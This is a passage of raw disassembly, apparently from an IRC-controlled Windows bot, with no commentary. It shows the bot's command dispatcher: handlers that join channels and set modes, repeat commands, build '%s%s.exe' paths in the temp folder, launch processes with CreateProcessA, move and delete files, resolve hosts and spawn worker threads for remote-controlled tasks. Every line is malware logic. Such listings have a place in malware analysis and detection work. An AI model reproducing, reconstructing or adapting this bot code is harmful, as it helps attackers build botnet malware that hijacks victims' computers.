jmp loc_411D8A
; ---------------------------------------------------------------------------
loc_4105C6: ; CODE XREF: sub_40CD3A+389A�j
push 32h
call dword_421060 ; Sleep
loc_4105CE: ; CODE XREF: sub_40CD3A+385D�j
cmp [ebp+var_1A40], ebx
jz short loc_4105C6
jmp short loc_4105B4
; ---------------------------------------------------------------------------
loc_4105D8: ; CODE XREF: sub_40CD3A+2408�j
; sub_40CD3A+241F�j
push 7Fh
lea eax, [ebp+var_158C]
push edi
push eax
call sub_416BE0
push [ebp+arg_18]
call sub_41587F
push 3Fh
mov [ebp+var_143C], eax
push [ebp+arg_0]
lea eax, [ebp+var_150C]
push eax
call sub_416BE0
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_410626
push 3Fh
lea eax, [ebp+var_14CC]
push esi
push eax
call sub_416BE0
add esp, 0Ch
loc_410626: ; CODE XREF: sub_40CD3A+38D8�j
lea eax, [ebp+var_150C]
mov [ebp+var_1438], 1
push eax
lea eax, [ebp+var_158C]
push [ebp+var_143C]
push eax
lea eax, [ebp+var_2D8]
push offset unk_434FB0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 17h
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_1434], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1590]
push ebx
push eax
push offset sub_40CA58
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1434]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4106B5
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434F60
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_4106AD: ; CODE XREF: sub_40CD3A+3981�j
push 32h
call dword_421060 ; Sleep
loc_4106B5: ; CODE XREF: sub_40CD3A+3960�j
cmp [ebp+var_1430], ebx
jz short loc_4106AD
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_4106C2: ; CODE XREF: sub_40CD3A+23C8�j
; sub_40CD3A+23DF�j
push [ebp+arg_18]
call sub_41587F
cmp eax, ebx
pop ecx
mov [ebp+var_6C0], eax
jle loc_4107B2
mov esi, 80h
push edi
lea eax, [ebp+var_848]
push esi
push eax
call sub_41588A
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_6BC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_84C], eax
lea eax, [ebp+var_748]
push esi
push eax
call sub_41588A
mov eax, [ebp+var_4]
push [ebp+arg_18]
mov [ebp+var_6B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_6B4], eax
push edi
push offset unk_434F1C
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
push ebx
lea eax, [ebp+var_2D8]
push 0Dh
push eax
call sub_414DDA
add esp, 38h
mov [ebp+var_6C8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_84C]
push ebx
push eax
push offset sub_401444
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_6C8]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4107A5
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434ED0
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_40CD3A+3A71�j
push 32h
call dword_421060 ; Sleep
loc_4107A5: ; CODE XREF: sub_40CD3A+3A50�j
cmp [ebp+var_6B0], ebx
jz short loc_41079D
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_4107B2: ; CODE XREF: sub_40CD3A+3999�j
push offset unk_434E80
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_4107BC: ; CODE XREF: sub_40CD3A+239A�j
; sub_40CD3A+23B1�j
push [ebp+arg_18]
push edi
call dword_421134 ; MoveFileA
test eax, eax
jz short loc_4107E9
push [ebp+arg_18]
lea eax, [ebp+var_2D8]
push edi
push offset unk_434E44
push 200h
push eax
call sub_41588A
jmp loc_411FAB
; ---------------------------------------------------------------------------
loc_4107E9: ; CODE XREF: sub_40CD3A+3A8E�j
push offset dword_434E24
call sub_409B27
push eax
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
add esp, 10h
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_41080D: ; CODE XREF: sub_40CD3A+236C�j
; sub_40CD3A+2383�j
push edi
lea eax, [ebp+var_13A0]
push 104h
push eax
call sub_41588A
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_410847
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_410847
push eax
lea eax, [ebp+var_129C]
push eax
call sub_415316
pop ecx
pop ecx
loc_410847: ; CODE XREF: sub_40CD3A+3AEB�j
; sub_40CD3A+3AFC�j
push [ebp+var_8C]
lea eax, [ebp+var_1420]
push 80h
push eax
call sub_41588A
mov eax, [ebp+arg_4]
mov [ebp+var_1424], eax
mov eax, [ebp+var_4]
mov [ebp+var_1194], eax
mov eax, [ebp+var_8]
mov [ebp+var_1190], eax
lea eax, [ebp+var_129C]
push eax
lea eax, [ebp+var_13A0]
push eax
push offset unk_434DE0
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
push ebx
lea eax, [ebp+var_2D8]
push 1Bh
push eax
call sub_414DDA
add esp, 2Ch
mov [ebp+var_1198], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1424]
push ebx
push eax
push offset sub_4086B2
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1198]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_41090C
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434D90
loc_4108F0: ; CODE XREF: sub_40CD3A+A55�j
; sub_40CD3A+A7B�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_415316
add esp, 0Ch
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_410904: ; CODE XREF: sub_40CD3A+3BD8�j
push 32h
call dword_421060 ; Sleep
loc_41090C: ; CODE XREF: sub_40CD3A+3BA8�j
cmp [ebp+var_118C], ebx
jz short loc_410904
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_410919: ; CODE XREF: sub_40CD3A+233E�j
; sub_40CD3A+2355�j
push 44h
lea eax, [ebp+var_31C]
pop esi
push esi
push ebx
push eax
call sub_415390
mov [ebp+var_31C], esi
xor esi, esi
inc esi
push edi
mov [ebp+var_2F0], esi
mov word ptr [ebp+var_2EC], bx
call sub_41587F
add esp, 10h
cmp eax, esi
jnz short loc_410956
mov word ptr [ebp+var_2EC], 5
loc_410956: ; CODE XREF: sub_40CD3A+3C11�j
cmp [ebp+var_C], ebx
jz loc_40F526
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_40F526
lea eax, [ebp+var_970]
push eax
lea eax, [ebp+var_31C]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call dword_4210EC ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2D8]
jnz short loc_4109A7
push offset unk_434D58
jmp loc_40EDC4
; ---------------------------------------------------------------------------
loc_4109A7: ; CODE XREF: sub_40CD3A+3C61�j
push edi
push offset dword_434D2C
jmp loc_40F51D
; ---------------------------------------------------------------------------
loc_4109B2: ; CODE XREF: sub_40CD3A+2310�j
; sub_40CD3A+2327�j
push [ebp+arg_18]
push offset aIds99 ; "ids99"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_410B25
lea eax, [ebp+var_A80]
push eax
push 104h
call dword_4210F8 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_D34]
push edi
push eax
call sub_416BE0
lea eax, [ebp+var_97C]
push eax
call sub_413FA0
push eax
lea eax, [ebp+var_A80]
push eax
lea eax, [ebp+var_C34]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_415316
mov eax, [ebp+esi+var_88]
add esp, 20h
cmp eax, ebx
mov [ebp+var_B30], 1
mov [ebp+var_B2C], ebx
jz short loc_410A44
push 10h
push ebx
push eax
call sub_416930
add esp, 0Ch
mov [ebp+var_B24], eax
jmp short loc_410A4A
; ---------------------------------------------------------------------------
loc_410A44: ; CODE XREF: sub_40CD3A+3CF4�j
mov [ebp+var_B24], ebx
loc_410A4A: ; CODE XREF: sub_40CD3A+3D08�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_410A64
push esi
call sub_41587F
pop ecx
mov [ebp+var_B28], eax
jmp short loc_410A6A
; ---------------------------------------------------------------------------
loc_410A64: ; CODE XREF: sub_40CD3A+3D19�j
mov [ebp+var_B28], ebx
loc_410A6A: ; CODE XREF: sub_40CD3A+3D28�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_B20], eax
lea eax, [ebp+var_DB4]
mov [ebp+var_DB8], esi
push eax
call sub_416BE0
mov eax, [ebp+var_4]
push edi
mov [ebp+var_B18], eax
mov eax, [ebp+var_8]
mov [ebp+var_B1C], eax
lea eax, [ebp+var_2D8]
push offset unk_434CE0
push eax
call sub_415316
push esi
lea eax, [ebp+var_2D8]
push 16h
push eax
call sub_414DDA
add esp, 24h
mov [ebp+var_B34], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_DB8]
push ebx
push eax
push offset sub_40BBF7
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_B34]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_410B18
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434C90
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_410B10: ; CODE XREF: sub_40CD3A+3DE4�j
push 32h
call dword_421060 ; Sleep
loc_410B18: ; CODE XREF: sub_40CD3A+3DC3�j
cmp [ebp+var_B14], ebx
jz short loc_410B10
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_410B25: ; CODE XREF: sub_40CD3A+3C89�j
push offset unk_434C38
jmp loc_40EDBE
; ---------------------------------------------------------------------------
loc_410B2F: ; CODE XREF: sub_40CD3A+22E2�j
; sub_40CD3A+22F9�j
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40D18F
cmp [ebp+var_C], ebx
jz loc_40D18F
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
push eax
lea eax, [ebp+var_2D8]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_434C24
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416BE0
push edi
call sub_41587F
add esp, 30h
test eax, eax
jle short loc_410BB6
push edi
call sub_41587F
imul eax, 3E8h
pop ecx
push eax
call dword_421060 ; Sleep
loc_410BB6: ; CODE XREF: sub_40CD3A+3E66�j
push offset dword_434BFC
call sub_40B078
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_410BCA: ; CODE XREF: sub_40CD3A+22B4�j
; sub_40CD3A+22CB�j
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40D18F
cmp [ebp+var_C], ebx
jz loc_412818
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_415730
add esp, 10h
test eax, eax
push esi
lea eax, [ebp+var_2D8]
jz short loc_410C86
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_434C24
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416BE0
push esi
lea eax, [ebp+var_2D8]
push offset dword_434BC8
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
push edi
call sub_41587F
add esp, 38h
test eax, eax
jle loc_412818
push edi
call sub_41587F
add eax, [ebp+arg_24]
pop ecx
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_410C86: ; CODE XREF: sub_40CD3A+3EDB�j
push offset dword_434B80
push eax
call sub_415316
add esp, 0Ch
jmp loc_411212
; ---------------------------------------------------------------------------
loc_410C99: ; CODE XREF: sub_40CD3A+2286�j
; sub_40CD3A+229D�j
push [ebp+arg_18]
lea eax, [ebp+var_2D8]
push offset dword_434B78
push eax
call sub_415316
push edi
call sub_41587F
add esp, 10h
loc_410CB6: ; CODE XREF: sub_40CD3A+3FE3�j
test eax, eax
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
loc_410CD0: ; CODE XREF: sub_40CD3A+48B9�j
lea eax, [ebp+var_2D8]
push eax
push offset dword_425090
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412B8B
jmp loc_412492
; ---------------------------------------------------------------------------
loc_410CF9: ; CODE XREF: sub_40CD3A+2258�j
; sub_40CD3A+226F�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2D8]
push [ebp+arg_18]
push offset dword_434B6C
push eax
call sub_415316
push edi
call sub_41587F
add esp, 14h
jmp short loc_410CB6
; ---------------------------------------------------------------------------
loc_410D1F: ; CODE XREF: sub_40CD3A+222A�j
; sub_40CD3A+2241�j
push [ebp+arg_18]
lea eax, [ebp+var_2D8]
push offset dword_434B64
push eax
call sub_415316
push edi
call sub_41587F
add esp, 10h
test eax, eax
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
lea eax, [ebp+var_2D8]
push eax
push offset dword_425090
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412B8B
push [ebp+arg_18]
push edi
push offset dword_434B34
loc_410D83: ; CODE XREF: sub_40CD3A+40D0�j
; sub_40CD3A+413B�j ...
call sub_40B0EC
jmp loc_41216C
; ---------------------------------------------------------------------------
loc_410D8D: ; CODE XREF: sub_40CD3A+21FC�j
; sub_40CD3A+2213�j
cmp [ebp+var_C], ebx
jz loc_412818
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_410DBE
push esi
lea eax, [ebp+var_2D8]
push offset dword_434B2C
push eax
call sub_415316
add esp, 0Ch
loc_410DBE: ; CODE XREF: sub_40CD3A+406D�j
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
lea eax, [ebp+var_2D8]
push eax
push offset dword_425090
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412B8B
push esi
push edi
push offset dword_434AFC
jmp loc_410D83
; ---------------------------------------------------------------------------
loc_410E0F: ; CODE XREF: sub_40CD3A+21CE�j
; sub_40CD3A+21E5�j
cmp [ebp+var_C], ebx
jz loc_412818
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_412818
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
push esi
push offset dword_425090
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412B8B
push esi
push edi
push offset dword_434ACC
jmp loc_410D83
; ---------------------------------------------------------------------------
loc_410E7A: ; CODE XREF: sub_40CD3A+21A0�j
; sub_40CD3A+21B7�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_412818
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push esi
push offset dword_434A90
jmp loc_4117D1
; ---------------------------------------------------------------------------
loc_410EB1: ; CODE XREF: sub_40CD3A+2172�j
; sub_40CD3A+2189�j
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_40D18F
push [ebp+arg_18]
push offset dword_434A84
push [ebp+arg_4]
call sub_412B8B
push edi
call sub_41587F
imul eax, 3E8h
add esp, 10h
push eax
call dword_421060 ; Sleep
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push offset dword_434A5C
call sub_40B078
jmp loc_4117D6
; ---------------------------------------------------------------------------
loc_410F17: ; CODE XREF: sub_40CD3A+2144�j
; sub_40CD3A+215B�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
call sub_415B10
push [ebp+arg_8]
mov esi, eax
call sub_415B10
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_4158E0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_412818
push esi
lea eax, [ebp+var_2D8]
push offset dword_435320
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_412BD1
push esi
push edi
push offset dword_434A2C
call sub_40B0EC
add esp, 2Ch
jmp loc_412818
; ---------------------------------------------------------------------------
loc_410F85: ; CODE XREF: sub_40CD3A+2116�j
; sub_40CD3A+212D�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
call sub_415B10
push [ebp+arg_8]
mov esi, eax
call sub_415B10
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_4158E0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_412818
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_412BD1
push esi
push edi
push offset dword_4349FC
call sub_40B0EC
loc_410FD3: ; CODE XREF: sub_40CD3A+2E76�j
add esp, 20h
jmp loc_412818
; ---------------------------------------------------------------------------
loc_410FDB: ; CODE XREF: sub_40CD3A+20E8�j
; sub_40CD3A+20FF�j
cmp [ebp+var_C], ebx
jz loc_40D18F
push [ebp+arg_18]
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40D18F
push eax
push edi
call sub_40AF80
push edi
lea eax, [ebp+var_2D8]
push offset dword_4349CC
push eax
call sub_415316
add esp, 14h
jmp loc_40F5D2
; ---------------------------------------------------------------------------
loc_41101A: ; CODE XREF: sub_40CD3A+20A8�j
; sub_40CD3A+20BF�j
push edi
push [ebp+arg_1C]
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz loc_412818
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4110B1
push esi
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
lea eax, [ebp+var_2D8]
jz short loc_41109F
push esi
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_434C24
push eax
call sub_415316
lea eax, [ebp+var_2D8]
push 1FFh
push eax
push [ebp+arg_0]
call sub_416BE0
push esi
push edi
lea eax, [ebp+var_2D8]
push offset dword_434994
push eax
call sub_415316
add esp, 34h
inc [ebp+arg_24]
jmp loc_411233
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_40CD3A+4313�j
push offset dword_434950
push eax
call sub_415316
pop ecx
pop ecx
jmp loc_411233
; ---------------------------------------------------------------------------
loc_4110B1: ; CODE XREF: sub_40CD3A+42FC�j
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40AC8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
push edi
push offset dword_434924
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
add esp, 24h
jmp loc_411233
; ---------------------------------------------------------------------------
loc_4110F8: ; CODE XREF: sub_40CD3A+1AFF�j
; sub_40CD3A+1B16�j
push offset aR ; "r"
push edi
call sub_415A08
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_411172
mov ebx, 200h
push esi
lea eax, [ebp+var_2D8]
push ebx
push eax
call sub_416FDC
add esp, 0Ch
jmp short loc_41114E
; ---------------------------------------------------------------------------
loc_411123: ; CODE XREF: sub_40CD3A+4416�j
push 1
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
push esi
lea eax, [ebp+var_2D8]
push ebx
push eax
call sub_416FDC
add esp, 20h
loc_41114E: ; CODE XREF: sub_40CD3A+43E7�j
test eax, eax
jnz short loc_411123
push esi
call sub_415960
push edi
lea eax, [ebp+var_2D8]
push offset dword_4348EC
push eax
call sub_415316
add esp, 10h
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_411172: ; CODE XREF: sub_40CD3A+43CF�j
push edi
push offset dword_4348B8
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_41117D: ; CODE XREF: sub_40CD3A+1AD1�j
; sub_40CD3A+1AE8�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_412818
push offset asc_426CF0 ; "\n"
push esi
call sub_415A30
push esi
call sub_40A506
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2D8]
jnz short loc_4111C0
push offset dword_434878
jmp short loc_41120A
; ---------------------------------------------------------------------------
loc_4111C0: ; CODE XREF: sub_40CD3A+447D�j
push esi
push offset dword_43484C
push eax
call sub_415316
add esp, 0Ch
jmp short loc_411233
; ---------------------------------------------------------------------------
loc_4111D1: ; CODE XREF: sub_40CD3A+1AA3�j
; sub_40CD3A+1ABA�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_412818
push eax
call sub_409BEC
test eax, eax
pop ecx
lea eax, [ebp+var_2D8]
jnz short loc_411205
push offset unk_43481C
jmp short loc_41120A
; ---------------------------------------------------------------------------
loc_411205: ; CODE XREF: sub_40CD3A+44C2�j
push offset dword_4347EC
loc_41120A: ; CODE XREF: sub_40CD3A+4484�j
; sub_40CD3A+44C9�j
push eax
call sub_415316
pop ecx
pop ecx
loc_411212: ; CODE XREF: sub_40CD3A+3F5A�j
cmp [ebp+var_8], ebx
jnz short loc_411233
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_411233: ; CODE XREF: sub_40CD3A+4360�j
; sub_40CD3A+4372�j ...
lea eax, [ebp+var_2D8]
push eax
loc_41123A: ; CODE XREF: sub_40CD3A+164A�j
call sub_40B078
pop ecx
jmp loc_412818
; ---------------------------------------------------------------------------
loc_411245: ; CODE XREF: sub_40CD3A+1A75�j
; sub_40CD3A+1A8C�j
push 7Fh
lea eax, [ebp+var_1824]
push edi
push eax
call sub_416BE0
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_411274
push 7Fh
lea eax, [ebp+var_17A4]
push esi
push eax
call sub_416BE0
add esp, 0Ch
loc_411274: ; CODE XREF: sub_40CD3A+4526�j
push 7Fh
lea eax, [ebp+var_1724]
push [ebp+var_8C]
push eax
call sub_416BE0
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_1828], eax
mov eax, [ebp+var_8]
mov [ebp+var_16A0], eax
mov eax, [ebp+var_4]
mov [ebp+var_169C], eax
lea eax, [ebp+var_2D8]
push offset dword_4347C0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 14h
push eax
call sub_414DDA
add esp, 24h
mov [ebp+var_16A4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1828]
push ebx
push eax
push offset sub_40AD52
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_16A4]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_411324
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434770
loc_411308: ; CODE XREF: sub_40CD3A+562C�j
lea eax, [ebp+var_2D8]
push eax
call sub_415316
add esp, 0Ch
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_41131C: ; CODE XREF: sub_40CD3A+45F0�j
push 32h
call dword_421060 ; Sleep
loc_411324: ; CODE XREF: sub_40CD3A+45C0�j
cmp [ebp+var_1698], ebx
jz short loc_41131C
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_411331: ; CODE XREF: sub_40CD3A+1A47�j
; sub_40CD3A+1A5E�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_4062F7
push edi
push offset dword_434744
jmp loc_410D83
; ---------------------------------------------------------------------------
loc_41134C: ; CODE XREF: sub_40CD3A+1A19�j
; sub_40CD3A+1A30�j
push 14h
lea eax, [ebp+var_858]
push ebx
push eax
call sub_415390
push edi
lea eax, [ebp+var_844]
push offset aS_1 ; "%s"
push eax
call sub_415316
mov eax, [ebp+arg_4]
mov [ebp+var_860], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_740]
push 80h
push eax
call sub_41588A
mov eax, [ebp+var_4]
mov [ebp+var_6B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_6B4], eax
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_844]
push eax
lea eax, [ebp+var_2D8]
push offset dword_43470C
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 12h
push eax
call sub_414DDA
add esp, 40h
mov [ebp+var_6BC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40B61A
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_6BC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_41141F
loc_411406: ; CODE XREF: sub_40CD3A+79D�j
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_4346C0
jmp loc_4108F0
; ---------------------------------------------------------------------------
loc_411417: ; CODE XREF: sub_40CD3A+46EB�j
push 32h
call dword_421060 ; Sleep
loc_41141F: ; CODE XREF: sub_40CD3A+46CA�j
cmp [ebp+var_6B0], ebx
jz short loc_411417
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_41142C: ; CODE XREF: sub_40CD3A+19EB�j
; sub_40CD3A+1A02�j
push edi
call dword_421118 ; DeleteFileA
test eax, eax
jz short loc_41143F
push edi
push offset dword_434690
jmp short loc_41144A
; ---------------------------------------------------------------------------
loc_41143F: ; CODE XREF: sub_40CD3A+46FB�j
push offset dword_434E24
call sub_409B27
push eax
loc_41144A: ; CODE XREF: sub_40CD3A+4703�j
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
loc_41145B: ; CODE XREF: sub_40CD3A+47E5�j
add esp, 10h
jmp loc_40F526
; ---------------------------------------------------------------------------
loc_411463: ; CODE XREF: sub_40CD3A+19BD�j
; sub_40CD3A+19D4�j
push edi
call sub_41587F
push eax
call sub_413EDB
xor esi, esi
pop ecx
inc esi
pop ecx
cmp eax, esi
push edi
lea eax, [ebp+var_2D8]
jnz short loc_411486
push offset dword_434658
jmp short loc_41148B
; ---------------------------------------------------------------------------
loc_411486: ; CODE XREF: sub_40CD3A+4743�j
push offset dword_434610
loc_41148B: ; CODE XREF: sub_40CD3A+474A�j
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40F54A
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
jmp loc_40F54A
; ---------------------------------------------------------------------------
loc_4114BE: ; CODE XREF: sub_40CD3A+198F�j
; sub_40CD3A+19A6�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_413C50
add esp, 18h
cmp eax, 1
push edi
jnz short loc_4114E0
push offset dword_4345D4
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_4114E0: ; CODE XREF: sub_40CD3A+479A�j
push offset dword_434590
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_4114EA: ; CODE XREF: sub_40CD3A+1961�j
; sub_40CD3A+1978�j
push edi
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_411524
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_43C9DC ; gethostbyaddr
cmp eax, ebx
jz short loc_41153F
push dword ptr [eax]
loc_41150D: ; CODE XREF: sub_40CD3A+4803�j
push edi
lea eax, [ebp+var_2D8]
push offset dword_434560
push eax
call sub_415316
jmp loc_41145B
; ---------------------------------------------------------------------------
loc_411524: ; CODE XREF: sub_40CD3A+47BD�j
push edi
call dword_43CAA8 ; gethostbyname
cmp eax, ebx
jz short loc_41153F
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_43CAB0 ; inet_ntoa
push eax
jmp short loc_41150D
; ---------------------------------------------------------------------------
loc_41153F: ; CODE XREF: sub_40CD3A+47CF�j
; sub_40CD3A+47F3�j
push offset dword_434524
jmp loc_40EDBE
; ---------------------------------------------------------------------------
loc_411549: ; CODE XREF: sub_40CD3A+1933�j
; sub_40CD3A+194A�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_416BE0
push edi
lea eax, [ebp+var_2D8]
push offset dword_4344EC
push eax
call sub_415316
add esp, 18h
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_41156E: ; CODE XREF: sub_40CD3A+1905�j
; sub_40CD3A+191C�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
